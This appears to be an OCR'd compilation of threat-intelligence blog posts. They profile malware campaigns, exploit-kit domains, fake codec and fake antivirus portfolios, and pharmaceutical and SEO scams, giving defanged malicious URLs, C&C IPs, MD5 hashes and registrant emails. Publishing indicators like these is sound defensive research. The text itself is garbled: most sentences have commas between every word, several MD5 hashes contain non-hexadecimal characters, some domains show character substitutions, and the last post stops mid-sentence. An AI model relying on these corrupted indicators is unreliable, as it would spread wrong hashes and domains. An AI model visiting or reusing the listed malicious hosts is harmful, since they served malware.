- fuadrenal.com - Email: fuadrenalRay@gmail.com - on, 2009-01-26, fuadrenal.com, is, 
known, to, have, responded, to, 202.73.57.6, followed, by, a, hosting, change, on, 2009-05-18, 
pointing, to, 202.73.57.11, followed, by, yet, another, hosting, change, on, 2009-07-13, 
this, time, pointing, to, 91.212.198.116, followed, by, yet, another, hosting, change, on, 
2009-08-17, this, time, pointing, to, 91.212.198.116. 


- rx-white.com - Email: johnvernet@gmail.com - on, 2009-05-18, rx-white.com, is, Known, to, 
have, responded, to, 202.73.57.6, followed, by, a, hosting, change, on, 2009-06-22, pointing, 
to, 202.73.57.11, followed, by, yet, another, hosting, change, on, 2009-07-06, this, time, 
pointing, to, 92.38.0.66, followed, by, yet, another, hosting, change, on, 2009-08-17, this, 
time, pointing, to, 91.212.198.116. 


In, 2009, |, profiled, the, direct, compromise, of, [17]Embassy of Portugal in India Serv- 
ing Malware, further, establishing, a, direct, connection, between, the, group’s, activities, and, 
the, Russian, Business, Network. 


On, 2009-03-30, ntkrnipa.info, is, Known, to, have, responded, to, 83.68.16.6. Related, do- 
mains, known, to, have, participated, in, the, same, campaign - betstarwager.cn; ntkrnipa.cn. 
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In, 2007, |, profiled, the, direct, compromise, of, French Embassy in Libya Serving Mal- 
ware, further, establishing, a, direct, connection, between, the, group’s, activities, and, the, 
Russian, Business, Network. 


On, 2008-11-05, tarog.us (Email: bobby10@mail.zp.ua), used, to, respond, to, 67.210.13.94, 
followed, by, a, hosting, change, on, 2009-03-02, pointing, to, 208.73.210.121. Related, 
domains, known, to, have, participated, in, the, campaign: fernandol123.ws; winhex.org - 
Email: [18]ipspec@gmail.com 


On, 2007-02-18, winhex.org, used, to, respond, to, 195.189.247.56, followed, by, a, hosting, 
change, on, 2007-03-03, pointing, to, 89.108.85.97, followed, by, yet, another, hosting, 
change, on, 2007-04-29, this, time, pointing, to, 203.121.71.165, followed, by, yet, another, 
hosting, change, on, 2007-08-19, this, time, pointing, to, 69.41.162.77. 


On, 2007-11-23, kjlksjwflk.com (Email:  sflgjlkj45@yahoo.com), used, to, respond, to, 
58.65.239.114, followed, by, a, hosting, change, on, 2009-02-16, pointing, to, 38.117.90.45, 
followed, by, yet, another, hosting, change, on, 2009-03-09, this, time, pointing, to, 
216.188.26.235. 


In, 2009, |, profiled, the, direct, compromise, of, [19]Azerbaijanian Embassies in Pak- 
istan and Hungary Serving Malware, further, establishing, a, direct, connection, between, the, 
group’s, activities, and, the, Russian, Business, Network. 


Related, domains, known, to, have, participated, in, the, campaign: 


- hxxp://filmlifemusicsite.cn; hxxp://promixgroup.cn; hxxp://betstarwager.cn; 
hxxp://clickcouner.cn 


In, 2009, I, profiled, the, direct, compromise, of, [20]USAID.gov compromised, malware 
and exploits served, further, establishing, a, direct, connection, between, the, gang’s, activi- 
ties, and, the, New, Media, Malware, Gang. 


Related, domains, known, to, have, participated, in, the, campaign: 


hxxp://should-be.cn - Email: admin@brut.cn; hxxp://orderasia.cn; hxxp://fileuploader.cn 
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In, 2007, I, profiled, the, direct, compromise, of, [21]U.S Consulate St. Petersburg Serv- 
ing Malware, further, establishing, a, direct, connection, between, the, group’s, activities, and, 
the, Russian, Business, Network. 


On, 2007-08-31, verymonkey.com (Email: srvs4you@gmail.com), used, to, respond, 
to, 212.175.23.114, followed, by, a, hosting, change, on, 2007-09-07, pointing, to, 
209.123.181.185, followed, by, yet, another, hosting, change, on, 2007-09-27, this, time, 
pointing, to, 88.255.90.50, followed, by, yet, another, hosting, change, on, 2008-11-11, this, 
time, pointing, to, 216.188.26.235. 


What’s, particularly, interested, about, the, gang’s, activities, is, the, fact, that, back, in 
2007, the, group, pioneered, for, the, first, time, the, utilization, of, Web, malware, ex- 
ploitation, kits, further, utilizing, the, infrastructure, of, the, Russian, Business, Network, 
successfully, launching, a, multi-tude, of, malicious, campaigns, further, spreading, malicious, 
software, further, utilizing, the, infrastructure, of, the, Russian, Business, Network. 


Related posts: 

[22]Syrian Embassy in London Serving Malware 
[23]USAID.gov compromised, malware and exploits served 
[24]U.S Consulate St. Petersburg Serving Malware 
[25]Bank of India Serving Malware 

[26]French Embassy in Libya Serving Malware 

[27]The Dutch Embassy in Moscow Serving Malware 
[28]Ethiopian Embassy in Washington D.C Serving Malware 
[29]Embassy of India in Spain Serving Malware 


[30]Azerbaijanian Embassies in Pakistan and Hungary Serving Malware 
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13.2.3 New Mobile Malware Spotted in the Wild, Hundreds of Users Affected 
(2017-05-29 08:29) 

We've, recently, intercepted, a, currently, circulating, malicious, mobile, malware, potentially, 
compromising, the, confidentiality, availability, and, integrity, of, the, compromised, devices, 
further, spreading, malicious, software, on, the, affected, devices, with, the, cybercriminals, 
behind, it, potentially, earning, fraudulent, revenue, in, the, process, of, monetizing, access, to, 
malware-infected, hosts, largely, relying, on, the, utilization, of, an, affiliate-network, based, 
type, of, revenue, sharing, scheme. 


In, this, post, we’ll, provide, actionable, intelligence, about, the, infrastructure, behind, 
it, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, cybercriminals, behind, 
it, and, further, expand, the, malicious, infrastructure, behind, the, campaign, successfully, 
exposing, the, malicious, actors, behind, it. 


Related, malicious, MD5s, known, to, have, participated, in, the, campaign: 
MD5: 12e6971511705b7396e4399ac46854f9 


MD5: e7d6fef2f1b23cf39a49771eb277e697 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://61.160.234.133/date/getDate 
hxxp://g.10086.cn/gamecms/wap/game/wyinfo/700144311000?channelld=12068000 
hxxp://ccinchina.com 


hxxp://117.135.133.9/source/appsource/15035916BaiduBrowser _Android _2-3-28-6 
_1000934d.apk?imei= 


hxxp://117.135.131.9/push _4/push.action?imei=value 


hxxp://61.160.242.35/pro _5/pro.action 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (61.160.234.133) 


MD5: ec125a741919574b7de29889845fe648 
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MD5: 695db5f40c02fa4eaeda76882de6c1f8 
MD5: 3281f34e42483b8a32f7a66dfed5a548 
MD5: ccd0a5805a82fdccb3ebdbdc95b432e8 


MD5: 07950552ddf728685b943254f390778d 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://agoldcomm.plat96.com 
hxxp://push7.devopenserv.com 


hxxp://cloud6.uuserv10.com 


g.10086.cn, is, Known, to, have, responded, to, 112.4.19.33; 221.181.195.141; 58.68.142.6; 
180.150.163.149; 58.68.142.188; 58.68.142.203; 60.217.242.152; 58.68.142.232; 
60.217.242.151; 112.90.217.110; 58.68.142.182; 58.68.142.183; 60.217.232.201; 
58.68.142.237;59.151.7.195 


Related, malicious, MD5s, known, to, have, responded, to, the, same, malicious, C &C, 
server, IPs: 


MD5: 15ddafelb32dc0b476cdaac92cc3eal2 
MD5: 60e7caba4395c77f88c72103aa3c14e2 
MD5: 9c692a6b2fc5b0d9f468cel1a110bd296 
MD5: 2beae563023a37559c3d0e2da577c517 
MD5: d9f63c321e345b2b1c91a1259003cfed 


MD5: 07950552ddf728685b943254f390778d 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://log6.devopenserv.com - 211.151.167.51 


hxxp://cloud6.devopenserv.com 
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hxxp://pus7.devopenserv.com 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs: 


MD5: 37845effed5d773252f129bd3fce588a 

MD5: 08beb447853aae8655f77ddc16a5766b 
MD5: 16147ec72345631cc345af69b2640578 
MD5: 4fcedf07023619b21358c259d11a90cb 


MD5: ab36173205aa7aeb713956b1f9eCc7b26 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://down.devopenserv.com 
hxxp://cloud.devopenserv.com 
hxxp://ck6.devopenserv.com 
hxxp://rck6.devopenserv.com 
hxxp://img14.devopenserv.com 
hxxp://dl8.devopenserv.com 
hxxp://dl14.devopenserv.com 
hxxp://cloud6.devopenserv.com 
hxxp://push7.devopenserv.com 
hxxp://dp3.devopenserv.com 
hxxp://cloud2.devopenserv.com 
hxxp://ck2.devopenserv.com 


hxxp://dp2.devopenserv.com 
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We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 

13.2.4 Historical OSINT - A Portfolio of Exploits Serving Domains (2017-05-29 09:04) 
With, the, rise, of, Web, malware, exploitation, kits, continuing, to, proliferate, cybercriminals, 
are, poised, to, continue, earning, fraudulent, revenue, in, the, process, of, monetizing, 
access, to, malware-infected, hosts, largely, relying, on, the, active,y utilization, of, client-side, 


exploits, further, soreaing, malicious, software, potentially, compromising, the, confidentiality, 
availability, and, integrity, of, the, targeted, host, to, a, multi-tude, of, malicious, software. 


What, used, to, be, an, ecosystem, dominated, by, proprietary, DIY (do-it-yourself) mal- 
ware and exploits, generating, tools, is, today’s, modern, cybercrime, ecosystem, dominated, 
by, Web, malware, exploitation, kits, successfully, empowering, novice, cybercriminals, with, 
the, necessary, tactics, techniques, and, procedures, for, the, purpose, of, launching, a, 
fraudulent, and, malicious, campaign, potentially, affecting, hundreds, of, thousands, of, 
users, globally. 


In, this, post, we'll, provide, actionable, intelligence, on, currently, active, IcePack, Web, 
malware, exploitation, kit, client-side, and, malware-exploits, serving, domains. 


Related IcePack Web Malware Exploitation Kit domains: 
hxxp://seateremok.com/xc/index.php 
hxxp://Iskdfjlerjvm.com/ice-pack/index.php 
hxxp://formidleren.dk/domain/mere.asp 
hxxp://webs-money.info/ice-pack/index.php 
hxxp://seateremok.com/xc/index.php 
hxxp://greeetthh.com/ice-pack1/index.php 
hxxp://58.65.235.153/ pozitive/ice/index.php 
hxxp://iframe911.com/troy/us/sp/ice/index.php 


hxxp://themusicmp3.info/rmpanfr/index.php 
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Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (Iskdfjlerjvm.com): 


MD5: 4cO0958f2f9f5ff2e5ac47e92d4006452 
MD5: d955372c7ef939502c43a71ffla9f76e 
MD5: 118e24ea884d375dc9f63c986al5e5df 
MD5: e€825a7e975a9817441da9bal054a3e6f 


MD5: 71460d4a1c7c18ec672fed56d764ebe6 


Once, executed, a, sample, malware (MD5: d955372c7ef939502c43a71ffla9f76e), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://riddenstorm.net - 208.100.26.234 
hxxp://lordofthepings.ru - 109.70.26.37 
hxxp://tableshown.net - 208.100.26.234 
hxxp://leadshown.net 
hxxp://tablefood.ru 

hxxp://tablefood.net - 180.210.34.47 
hxxp://leadfood.net 
hxxp://tablemeet.net 
hxxp://leadmeet.net 
hxxp://pointneck.net 
hxxp://pointshown.net 
hxxp://callshown.net - 212.61.180.100 
hxxp://callneck.ru 

hxxp://callneck.net 

hxxp://ringshown.ru 


hxxp://ringshown.net 
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hxxp://noneshown.net 


We'll, continue, monitoring, the, campaigns, and, post, updates, as, soon, as, new, de- 
velopments, take, place. 

13.2.5 Historical OSINT - A Portfolio of Fake/Rogue Video Codecs (2017-05-29 09:27) 
Shall we expose a huge domains portfolio of fake/rogue video codecs dropping the same 


Zlob variant on each and every of the domains, thereby acting as a great example of what 
malicious economies of scale means? 


Currently active Zlob malware variants promoting sites: 
hxxp://porngqaz.com 
hxxp://uinsex.com 
hxxp://qazsex.com 
hxxp://sexwhite.net 
hxxp://lightporn.net 
hxxp://xeroporn.com 
hxxp://brakeporn.net 
hxxp://sexclean.net 
hxxp://delfiporn.net 
hxxp://pornfire.net 
hxxp://redcodec.net 
hxxp://democodec.com 
hxxp://delficodec.com 
hxxp://turbocodec.net 
hxxp://gamecodec.com 


hxxp://blackcodec.net 
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hxxp://xerocodec.com 
hxxp://ixcodec.net 
hxxp://codecdemo.com 
hxxp://ixcodec.com 
hxxp://citycodec.com 
hxxp://codecthe.com 
hxxp://codecnitro.com 
hxxp://codecbest.com 
hxxp://codecspace.com 
hxxp://popcodec.net 
hxxp://uincodec.com 
hxxp://xhcodec.com 
hxxp://stormcodec.net 
hxxp://codecmega.com 
hxxp://whitecodec.com 
hxxp://jetcodec.com 
hxxp://endcodec.com 
hxxp://abccodec.com 
hxxp://codecred.net 
hxxp://cleancodec.com 
hxxp://nerocodec.com 


hxxp://nicecodec.com 


Related MD5s, known, to, have, participated, in, the, campaign: 


MD5: 30965fdbd893990dd24abda2285d9edc 
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Why are the malicious parties so KISS oriented at the end of every campaign, compared 
to the complexity and tactical warfare tricking automated malware harvesting approaches 
within the beginning of the campaign? Because they’re not even considering the possibility of 
proactively detecting the end of many other malware campaigns to come, which will inevitable 
be ending up to these domains. 


13.2.6 Historical OSINT - A Diversified Portfolio of Fake Security Software 
(2017-05-29 09:38) 
Cybercriminals, continue, actively, launching, malicious, and, fraudulent, campaigns, further, 


spreading, malicious, software, potentially, exposing, the, confidentiality, availability, and, 
integrity, of, the, targeted, host, to, a, multi-tude, of, malicious, software. 


In, this, post, we'll, profile, a, currently, active, portfolio, of, fake, security, software, 
and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, cybercriminals, 
behind, it. 


Known, to, have, responded, to, the, same, malicious, C &C, server, IPs (91.212.226.203; 
94.228.209.195), are, also, the, following, malicious, domains: 


hxxp://thebest-antivirusO0.com 
hxxp://virusscannerpro0.com 
hxxp://lightandfastscanner01.com 
hxxp://thebest-antivirusO1.com 
hxxp://thebestantivirusO1l.com 
hxxp://remove-spyware-11.com 
hxxp://remove-virus-11.com 
hxxp://thebest-antivirusl11.com 
hxxp://antispyware-modulel.com 
hxxp://antispywaremodulel.com 
hxxp://antivirus-toolsr1.com 


hxxp://thebest-antivirus1.com 
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hxxp://thebest-antivirusx1.com 
hxxp://thebestantivirusO2.com 
hxxp://remove-spyware-12.com 
hxxp://remove-virus-12.com 
hxxp://delete-all-virus-22.com 
hxxp://lightandfastscanner22.com 
hxxp://prosecureprotection2.com 
hxxp://virusscannerpro2.com 
hxxp://antivirus-toolsr2.com 
hxxp://thebest-antivirusx2.com 
hxxp://thebestantivirusO3.com 
hxxp://remove-spyware-13.com 
hxxp://remove-virus-13.com 
hxxp://antispoyware-module3.com 
hxxp://antispywaremodule3.com 
hxxp://virusscannerpro3.com 
hxxp://windowsantivirusserver3.com 
hxxp://thebest-antivirusx3.com 
hxxp://thebestantivirus0O4.com 
hxxp://remove-spyware-14.com 
hxxp://remove-virus-14.com 
hxxp://antispyware-scann4.com 
hxxp://antivirus-toolsr4.com 
hxxp://thebest-antivirusx4.com 


hxxp://thebestantivirus05.com 
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hxxp://remove-all-spyware-55.com 
hxxp://delete-all-virus-55.com 
hxxp://thebest-antivirusx5.com 
hxxp://remove-spyware-16.com 
hxxp://lightandfastscanner66.com 
hxxp://antispoywaremodule6.com 
hxxp://antispyware-module7.com 
hxxp://antispywaremodule7.com 
hxxp://antivirus-toolsr7.com 
hxxp://antispyware-scann8.com 
hxxp://pro-secure-protection8.com 
hxxp://windowsantivirusserver8.com 
hxxp://antispyware-module9.com 
hxxp://antispywaremodule9.com 
hxxp://antispyware-scann9.com 
hxxp://virusscannerpro9.com 
hxxp://antivirus-toolsr9.com 
hxxp://thebest-antivirus9.com 
hxxp://antivirusprolscan.com 
hxxp://antiviruspro2scan.com 
hxxp://antiviruspro7scan.com 
hxxp://antiviruspro8scan.com 
hxxp://antiviruspro9scan.com 
hxxp://antispoyware6sacnner.com 


hxxp://antivirusv1ltools.com 
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hxxp://antisoywarelOwindows.com 
hxxp://antispyware20windows.com 
hxxp://antivirus-toolsvv.com 
hxxp://remove-spyware-11.com 
hxxp://remove-virus-11.com 
hxxp://remove-spyware-12.com 
hxxp://remove-virus-12.com 
hxxp://delete-all-virus-22.com 
hxxp://prosecureprotection2.com 
hxxp://remove-spyware-13.com 
hxxp://remove-virus-13.com 
hxxp://windowsantivirusserver3.com 
hxxp://remove-spyware-14.com 
hxxp://remove-virus-14.com 
hxxp://remove-all-spyware-55.com 
hxxp://delete-all-virus-55.com 
hxxp://remove-spyware-16.com 
hxxp://pro-secure-protection8.com 
hxxp://windowsantivirusserver8.com 
hxxp://antivirus-toolsr9.com 
hxxp://antivirusv1ltools.com 
hxxp://antispywarel0windows.com 
hxxp://antispyware20windows.com 


hxxp://antivirus-toolsvv.com 
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Known, to, have, responded, to, the, same, malicious, C &C, server, IPs (94.228.209.195), 
are, also, the, following, malicious, domains: 


hxxp://run-antivirusscan0.com 
hxxp://runantivirusscan0.com 
hxxp://remove-spyware-11.com 
hxxp://remove-virus-11.com 
hxxp://run-virus-scannerl.com 
hxxp://remove-spyware-12.com 
hxxp://remove-virus-12.com 
hxxp://delete-all-virus-22.com 
hxxp://remove-spyware-13.com 
hxxp://remove-virus-13.com 
hxxp://runantivirusscan3.com 
hxxp://run-virusscanner3.com 
hxxp://remove-spyware-14.com 
hxxp://remove-virus-14.com 
hxxp://run-virusscanner4.com 
hxxp://remove-virus-15.com 
hxxp://remove-all-spyware-55.com 
hxxp://delete-all-virus-55.com 
hxxp://remove-spyware-16.com 
hxxp://run-virus-scanner6.com 
hxxp://run-virusscanner6.com 
hxxp://runantivirusscan8.com 


hxxp://run-virus-scanner8.com 
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hxxp://windowsantivirusserver8.com 
hxxp://run-virus-scanner9.com 


hxxp://run-virusscanner9.com 


Related, fraudulent, and, malicious, domains, Known, to, have, participated, in, the, 
campaign: 


hxxp://run-antivirusscan0.com 
hxxp://run-antivirusscanl.com 
hxxp://run-antivirusscan3.com 
hxxp://run-antivirusscan6.com 
hxxp://run-antivirusscan8.com 
hxxp://runantivirusscan0.com 
hxxp://runantivirusscan3.com 
hxxp://runantivirusscan4.com 
hxxp://runantivirusscan9.com 


hxxp://securepro-antivirus1.com 


Known, to, have, responded, to, the, same, malicious, C &C, server, IPs (91.212.226.203), 
are, also, the, following, malicious, domains: 


hxxp://anti-virus-system0.com 
hxxp://run-antivirusscan0.com 
hxxp://runantivirusscan0.com 
hxxp://perform-antivirus-scan-1.com 
hxxp://remove-spyware-11.com 
hxxp://remove-virus-11.com 


hxxp://antivirus-system1.com 
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hxxp://performspywarescanl.com 
hxxp://run-virus-scannerl.com 
hxxp://remove-spyware-12.com 
hxxp://remove-virus-12.com 
hxxp://delete-all-virus-22.com 
hxxp://antivirus-scanner-3.com 
hxxp://remove-spyware-13.com 
hxxp://remove-virus-13.com 
hxxp://runantivirusscan3.com 
hxxp://run-virusscanner3.com 
hxxp://remove-spyware-14.com 
hxxp://remove-virus-14.com 
hxxp://gloriousantivirus2014.com 
hxxp://run-virusscanner4.com 
hxxp://smart-pcscanner05.com 
hxxp://remove-virus-15.com 
hxxp://remove-all-spyware-55.com 
hxxp://delete-all-virus-55.com 
hxxp://perform-virus-scan5.com 
hxxp://perform-antivirus-scan-6.com 
hxxp://antivirus-scanner-6.com 
hxxp://remove-spyware-16.com 
hxxp://run-virus-scanner6.com 
hxxp://run-virusscanner6.com 


hxxp://antivirus-scan-server6.com 
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hxxp://perform-antivirus-scan-7.com 
hxxp://perform-antivirus-test-7.com 
hxxp://antivirus-win-system7.com 
hxxp://antivirus-for-pc-8.com 
hxxp://perform-antivirus-scan-8.com 
hxxp://perform-antivirus-test-8.com 
hxxp://run-antivirusscan8.com 
hxxp://runantivirusscan8.com 
hxxp://run-virus-scanner8.com 
hxxp://windowsantivirusserver8.com 
hxxp://perform-antivirus-test-9.com 
hxxp://perform-virus-scan9.com 
hxxp://antispywareinfo9.com 
hxxp://run-virus-scanner9.com 
hxxp://run-virusscanner9.com 
hxxp://antispoywareO6scan.com 
hxxp://antispywareinfo9.com 
hxxp://antivirus-for-pc-2.com 
hxxp://antivirus-for-pc-4.com 
hxxp://antivirus-for-pc-6.com 
hxxp://antivirus-for-pc-8.com 
hxxp://antiviruspro8scan.com 
hxxp://extra-antivirus-scanl.com 
hxxp://extra-security-scanb1l.com 


hxxp://run-antivirusscan0.com 
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hxxp://run-antivirusscanl.com 
hxxp://run-antivirusscan3.com 
hxxp://run-antivirusscan6.com 
hxxp://run-antivirusscan8.com 
hxxp://runantivirusscan0.com 
hxxp://runantivirusscan3.com 
hxxp://runantivirusscan4.com 
hxxp://runantivirusscan9.com 
hxxp://securepro-antivirusl.com 
hxxp://super-scanner-2004.com 
hxxp://top-rateanrivirusO.com 


hxxp://topantimalware-scanner7.com 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 


13.2.7 Historical OSINT - Google Sponsored Scareware Spotted in the Wild 
(2017-05-29 15:48) 


Cybercriminals continue actively spreading malicious software while looking for alternative 
ways to acquire and monetize legitimate traffic successfully earning fraudulent revenue in the 
process of spreading malicious software. 


We've recently came across to a Google Sponsored scareware campaign successfully en- 
ticing users into installing fake security software on their hosts further earning fraudulent 
revenue in the process of monetizing access to malware-infected hosts largely relying on the 
utilization of an affiliate-network based type of revenue sharing scheme. 


In this post we’ll profile the campaign, provide actionable intelligence, on the infrastructure, 
behind it and discuss in-depth, the tactics techniques and procedures of the cybercriminals 
behind it. 
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hxxp://www.google.com/aclk?sa=I &ai=Czd4NEnILS-pWIrS1A-jBmlwO9pfinQHOjKCvEI2ZB8woQAigIUP; 
wFgyZajiqSkxBGgAabhse4DyAEBqgQhT9 


CjnzChYHf5zZQB4c8FB-fW9WUzgcUT Q4c7ciD4Gyxs0 &num=5 &sig=AGiWqtyOUg3Kr6U1Sb10o0lrq6C2 
_w &q=http://www.adwarepronow.com 


hxxp://www.google.com/aclk?sa=L &ai=COLkK5EnILS-pWIrS1A-j;Bm|lwO0YGZmMwGz9aqwDbiw8bcBEAL 
8BYMmWo4qkpMQRyAEBqgQZT9 


CTVAGhbX _5PQN _7QaAIk7HT3dQfrql/Q &num=8amp;sig=AGiWqtyHmo4mgVkszSWtDUcT4dM- 
RUAQnXg &q=http://www.antimalware-2010.com 


Known malicious domains known to have participated in the campaign: 


hxxp://www.adwarepronow.com/?gclid=CjJ6d8LSGnZ8CFRMqagodmR __KaA - 209.216.193.112 


Known malicious domains known to have participated in the campaign: 


hxxp://www.antimalware-2010.com/ - 209.216.193.119 


Sample detection rate for a sample malware: 


MD5: 8328da91c8eba6668b3e72d547157ac7 


Sample detection rate for a sample malware: 


MD5: b74412ea403241c9c60482fd13540505 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://72.167.164.199/definitions/configuration.txt 


hxxp://72.167.164.199/latestversion/AntiMalwarePro _appversion.txt 
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We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


13.2.8 Historical OSINT - A Diversified Portfolio of Pharmacautical Scams Spotted in 
the Wild (2017-05-29 16:04) 


Cybercriminals continue actively speading fraudulent and malicious campaigns potentially 
targeting the confidentiality availability and integrity of the targeted host to a multi-tude of 
malicious software further earning fraudulent revenue in the process of monetizing access 
to malware-infected hosts further spreading malicious and fraudulent campaigns potentially 
affecting hundreds of thousands of users globally. 


We've recently came across to a currently active diversified portfolio of pharmaceutical 
scams with the cybercriminals behind it successfully earning fraudulent revenue in the 
process of monetizing access to malware-infected hosts including the active utilization of an 
affiliate-network based type of revenue sharing scheme. 


In this post we’ll profile the campaign, provide actionable intelligence, on the infrastructure 
behind it, and discuss in depth, the tactics techniques and procedures of the cybercriminals 
behind it. 
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5566 


hxxp://feetboy.ru 
hxxp://arguebury.ru 
hxxp://chairchevy.ru 
hxxp://birthsea.com 
hxxp://sourcegood.com 
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hxxp://tablemindss.com 
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hxxp://backgrass.com 
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hxxp://hatfloos.com 
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hxxp://bridebottle.com 
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hxxp://boxlams.com 
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hxxp://truckblus.com 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


13.2.9 Historical OSINT - Massive Black Hat SEO Campaign Spotted in the Wild 
(2017-05-29 19:28) 


Cybercriminals continue actively launching fraudulent and malicious blackhat SEO campaigns 
further acquiring legitimate traffic for the purpose of converting it into malware-infected hosts 
further spreading malicious software potentially compromising the confidentiality availability 
and integrity of the targeted host to a multi-tude of malicious software. 


We've recently intercepted a currently active malicious blackhat SEO campaign serving 
scareware to socially engineered users with the cybercriminals behind it earning fraudulent 
revenue largely relying on the utilization of an affiliate-network based revenue-sharing 
scheme. 


In this post we’ll profile the campaign, provide actionable intelligence on the infrastructure 
behind it, and discuss in-depth the tactics techniques and procedures of the cybercriminals 
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behind it. 


Known malicious domains known to have participated in the campaign: 


hxxp://doremisan7.net?uid=213 &pid=3 &ttl=319455a3f86 - 67.215.238.189 


Known malicious redirector known to have participated in the campaign: 


hxxp://marketcoms.cn/?pid=123 &sid=8ec7ca &uid=213 &isRedirected=1 - 91.205.40.5 - 
Email: JeremyLRademacher@live.com 


Related malicious domains known to have been parked within the same malicious IP 
(91.205.40.5): 


hxxp://browsersafeon.com 
hxxp://online-income2.cn 
hxxp://applestore2.cn 
hxxp://media-news2.cn 
hxxp://clint-eastwood.cn 
hxxp://stone-sour.cn 
hxxp://marketcoms.cn 


hxxp://fashion-news.cn 


Known malicious domains known to have participated in the campaign: 


hxxp://guard-syszone.net/?p=WKmimHVmaWyHjsblo22EexXZe0KCfZlbVoKDb2YmMHWJjOxaCbk 
X1 %2Bal6orKWeYJWfZW 


VilWWenGOIlo6THodjxXoGJdpqmikpVuaGVvZG1kbV %2FEKKE %3D - 206.53.61.73 


hxxp://yourspywarescan15.com/scan1/?pid=123 &engine=pXT3wjTUNjYZLjE3Ny4xNTMmdGItZTOxM- 
jUxXMYKNPAFO - 85.12.24.12 
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Sample detection rate for sample malware: 
MD5: 3d448b584d52c6a6a45ff369d839eb06 


MD5: 54f671bb9283bf4dfdf3c891fd9cd700 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


13.2.10 Historical OSINT - Mac OS X PornTube Malware Serving Domains 
(2017-05-29 20:05) 

Cybercriminals continue to actively launch maliciuos and fraudulent malware-serving cam- 

paigns further spreading malicious software potentially compromising the confidentiality 

availability and integrity of hte targeted host to a multit-tude of malicious software further 


spreading malicious software while earning fraudulent revenue in the process of monetizing 
access to malware-infected hosts. 


We've recently intercepted a currently active portfolio of rogue/fake/ PornTube malicious 
and fraudulent domains, with the cybercriminals behind the campaign earning fraudulent rev- 
enue largely relying on the utilization of an affiliate-network based revenue-sharing scheme. 


In this post we’ll profile the campaign, provide actionable intelligence on the infrastructure 
behind it, and discuss in-depth the tactics techniques and procedures of the cybercriminals 
behind it. 


Known to have been parked within the same malicious IP (93.190.140.56) are also the 
following malicious domains: 


hxxp://playfucktube.com 
hxxp://mac-videos.com 
hxxp://xhottube.net 
hxxp://playfucktube.comtubeporn08.com 


hxxp://porn-tube09.com 


5575 


hxxp://tubeporn09.com 
hxxp://xxxporn-tube.com 
hxxp://playfucktube.com 
hxxp://allsoft-free.com 
hxxp://all-softfree.com 
hxxp://Isoftfree.com 
hxxp://porntubenew.com 
hxxp://pornmegatube.net 


hxxp://xhottube.net 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


13.3 July 


13.3.1 Introducing Obmonix - The World’s Most Comprehensive Sensor Network 
(2017-07-28 07:40) 


The world’s leading expert in the field of the security cybercrime research and threat 
intelligence gathering presents the [1]World’s Most Comprehensive Sensor Network for 
offensive cybercrime/cyberterrorism fighting introducing active sensor deployment cyber- 
crime/cyberterrorism forum and dark-web infiltration launching the Disruptive Individuals 
startup successfully disrupting and undermining the cybercrime/cyberterrorism ecosystem. 


Disruptive 
Individuals 


What is the Obmonix Platform? 
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The Obmonix platform aims to build the World’s most versatile and comprehensive sen- 
sor network for intercepting monitoring and responding to cybercrime and cyber jihad events 
successfully deploying a variety of proprietary sensor network based of honeypot appliances 
industry-wide partnership including the utilization of proprietary cybercrime and cyber jihad 
forum and community monitoring and infiltration campaigns successfully positioning the 
platform as the leading indicator for cybercrime and cyber jihad activity globally empowering 
the operator law enforcement and the security industry with then necessary tactics techniques 
and procedures (TTPs) for successfully responding and monitoring cybercrime and cyber jihad 
activity globally leading to successful launch of the Disruptive Individuals startup successfully 
serving the needs of the Intelligence Community, the security industry and law enforcement 
agencies globally successfully anticipating an emerging set of malicious and fraudulent tactics 
techniques and procedures successfully protecting millions of users globally. 


What is the Obmonix Sensor Network? 


The Obmonix platform aims to build the World's most versatile and comprehensive sensor network for 
intercepting monitoring and responding to cybercrime and cyber jihad events successfully deploying a variety of 
proprietary sensor network based of honeypot appliances industry-wide partnership including the utilization of 
proprietary cybercrime and cyber jihad forum and community monitoring and infiltration campaigns successfully 
positioning the platform as the leading indicator for cybercrime and cyber jihad activity globally empowering the 
operator law enforcement and the security industry with then necessary tactics techniques and procedures 
(TTPs) for successfully responding and monitoring cybercrime and cyber jihad activity globally leading to 
successful launch of the Disruptive Individuals startup successfully serving the needs of the Intelligence 
Community, the security industry and law enforcement agencies globally successfully anticipating an emerging 
set of malicious and fraudulent tactics techniques and procedures successfully protecting millions of users 
globally. 


How you can help and contribute? 


Feel free to join the [2]Indiegogo funds raising campaign and stay tuned for the associ- 
ated perks. 
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Looking forward to receiving your response at disruptive.individuals@gmail.com 


Stay tuned! 


1. https://www.indiegogo.com/projects/the-world-s-most-comprehensive-sensor-network-securit 


2. https: //www.indiegogo.com/projects/the-world-s-most-comprehensive-sensor-network-securit 


13.4 November 


13.4.1 New Mobile Malware Spotted in the Wild, Hundreds of Users Affected 
(2017-11-09 19:06) 


We've recently, intercepted, a 

currently, circulating, malicious, soam, campaign, affecting, 
hundreds, of users, globally, potentially, exposing, the, 
confidentiality, availability, and, integrity, of, their, devices, 

to, a, multi-tude, of, malicious, software. Largely, relying, on, a, 
multi-tude, of social engineering, vectors, the, cybercriminals, 

behind, the, campaign, have, managed, to, successfully, impersonate, 
Adobe Flash Player, users, into, thinking, that, they’re, visiting, 

a, legitimate, Web 


site, on, their, way, to, infect, 
their, devices, relying, on, bogus "Please update Flash on 
your device", messages. 


Over, the, last, couple, of, years, 

